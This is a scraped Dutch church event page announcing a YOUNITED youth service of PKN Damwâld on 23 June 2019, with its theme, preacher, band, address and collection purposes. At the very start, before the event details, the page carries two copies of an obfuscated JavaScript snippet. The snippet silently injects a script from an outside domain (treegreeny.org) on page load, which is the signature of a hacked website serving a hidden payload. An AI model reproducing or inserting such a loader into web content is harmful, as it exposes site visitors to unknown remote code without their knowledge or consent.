;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); YOUNITED-jeugdkerk - PKN Damwâld
zondag 23 juni 2019
16:00 uur

YOUNITED-jeugdkerk

Thema: De kerk op straat

Informatie

Voorganger:Robert Colijn
Organist:M.m.v. gospelband SOON RETURN
Thema:De kerk op straat
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Goed doel
Uitganscollecte: onkosten en sponsorkind Miracle via Compassion